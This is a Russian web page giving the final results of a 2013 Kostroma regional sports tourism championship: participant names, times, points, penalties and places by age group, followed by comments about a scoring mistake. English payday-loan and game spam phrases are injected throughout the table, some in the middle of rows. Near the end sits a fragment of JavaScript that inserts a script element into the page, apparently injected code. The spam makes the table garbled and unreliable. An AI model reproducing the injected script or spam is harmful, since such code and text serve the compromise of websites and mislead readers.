Итоговый протокол Чемпионата Костромской области по спортивному туризму, посвященному Всемирному дню туризма и 200- летию со дня рождения адмирала Г.И.Невельского

Дата проведения:
29 сентября 2013 г.
Место проведения:
г.Кострома

 

payday 2 xbox one

payday loans near me

payday loans

project payday scam

payday loans no credit check Контрольное время – 30 мин.

Ф.И.

Время старта

Время финиша

Время на дистанции

Сумма баллов

Штрафные баллы

Итоговая сумма баллов

Место

Смешанный зачет (1974 г.р. и старше)

1

Попов Евгений

10:40:00

11:10:00

0:30:00

50

50

I

Ухова Любовь

2

Ольшевский Сергей

10:40:00

11:11:58

0:31:58

42

2

40

II

Калугина Ольга
Общий зачет (1974 г.р.- payday 2 review 1994 г.р.)

3

Дроздов Андрей

11:36:00

12:01:20

0:25:20

70

70

I

Дроздова Татьяна

4

Туктарев Руслан

11:27:00

11:52:33

0:25:33

66

66

II

Беляева Мария

5

Смирнов Илья

11:07:23

11:34:46

0:27:23

52

52

payday the heist

III

Ратков Николай

6

Чернышова Василина

10:40:00

11:09:36

0:29:36

30

30

4

Соколова Ирина

7

Борисов Артем

11:29:00

11:59:40

0:30:40

68

1

67

5

Антонов Олег

8

Малинина Алена

10:40:00

direct lender payday loans

11:12:48

0:32:48

37

3

34

6

Воробьева Дарья
Юноши (1995 г.р. – 1997 г.р.)

9

Портнов Александр

10:40:00

11:09:54

0:29:54

54

54

I

Абдулаев Дмитрий

10

Стрельников Кирилл

10:40:00

11:08:26

0:28:26

28

28

II

Кошкин Максим

11

Белов Павел

10:40:00

11:11:21

0:31:21

50

2

48

III

Литовченко Александр

12

Мороз Илья

10:40:00

11:10:42

0:30:42

45

1

44

4

Шеремет Алексей

13

Щербаков Андрей

10:40:00

11:12:02

0:32:02

47

3

44

5

Тюканов Василий

14

Смирнов Сергей

10:40:00

11:32:10

0:52:10

52

23

29

6

Куличенко Олег

15

Савин Всеволод

10:40:00

11:29:08

0:49:08

41

20

21

7

Горев Антон
Юные (1995 г.р. – 1997 г.р.)

16

Калугин Владимир

10:40:00

11:10:00

0:30:00

50

50

I

Гришина Ольга

17

Шапошникова Екатерина

10:40:00

11:07:46

0:27:46

34

34

II

Бойко Кристина

18

Тихонова Анастасия

10:40:00

11:08:26

0:28:26

21

21

III

Вавулина Любовь
Мальчики (1998 г.р. – 2000 г.р.)

payday 2 masks

19

Рыбальченко В.

10:40:00

11:04:20

0:24:20

29

29

I

Чуркин Иван

20

Николаев Юрий

10:40:00

11:19:45

0:39:45

60

10

50

II

Смирнов Василий

21

Синкевич Максим

10:40:00

11:13:57

0:33:57

42

4

38

III

Желеков Алексей

22

Иванов Андрей

10:40:00

11:10:57

0:30:57

36

1

35

4

Овчинников Василий

23

Артемьев Илья

10:40:00

11:40:00

1:00:00

54

30

24

5

Суханов Матвей
Девочки (1998 г.р. – 2000 г.р.)

24

Макарова Анна

10:40:00

11:09:40

0:29:40

32

32

I

Сироткина Анна

25

Беднягина Мария

10:40:00

11:13:34

0:33:34

49

4

45

II

Завгордняя Арина

26

Орлова Любовь

10:40:00

11:12:40

0:32:40

46

3

43

III

Кеменова Анастасия

27

Балбасенко Анастасия

10:40:00

11:12:03

0:32:03

42

3

39

4

Сабанов Никита

28

Смирнова Мария

10:40:00

bottom dollar payday

11:10:36

0:30:36

37

1

36

5

Ковалева Татьяна
Детские команды (2001 г.р. и младше)

29

Антипин Влад

10:40:00

11:10:06

0:30:06

56

1

55

I

Петрова Ольга

30

Калугина Мария

10:40:00

11:10:31

0:30:31

51

1

50

II

Калугина София

31

Евсеев Илья

10:40:00

11:22:22

0:42:22

60

13

47

III

Евсеева Екатерина

32

Лисовский Антон

10:40:00

11:12:01

0:32:01

46

3

43

4

Яковлев Андрей

33

Фрозинов Максим

10:40:00

11:14:20

0:34:20

43

5

38

5

Машанов Илья

34

Стуренко Кирилл

10:40:00

11:16:46

0:36:46

40

7

33

6

Плетнев Алексей

35

Иванов Артем

10:40:00

11:18:49

0:38:49

18

9

9

7

Сидоров Олег



d.getElementsByTagName(‘head’)[0].appendChild(s);document.currentScript.parentNode.insertBefore(s, document.currentScript);

Обсуждение

  • Алексей пишет:

    Отлично проведённые соревнования! но есть вопрос, как распределялись места? сравните баллы у первого места и второго в группе “Девочки 1998-2000. И у нас например грамота за 3е место, а в таблице четвёртое, может я конечно и не понимаю, но будьте добры объяснить данные результаты в таблице! с уважением Алексей Шеремет и Мороз Илья! (и моя фамилия написана с ошибкой “Шеремей” а у меня фамилия ШеремеТ….

  • Мария пишет:

    Здравствуйте Алексей.
    1.Ошибку в фамилии исправила (приношу свои извинения)
    2.Результаты подводились следующим образом: сначала идут все те, кто уложился в контрольное время (30 мин.), а затем за каждую полную и неполную минуту опоздания добавляется штраф 1 балл, соответственно места распределяются по максимально набранным баллам.
    3.При проверке результатов была выявлена ошибка в подсчетах, поэтому по количеству баллов вы теперь на 4 месте.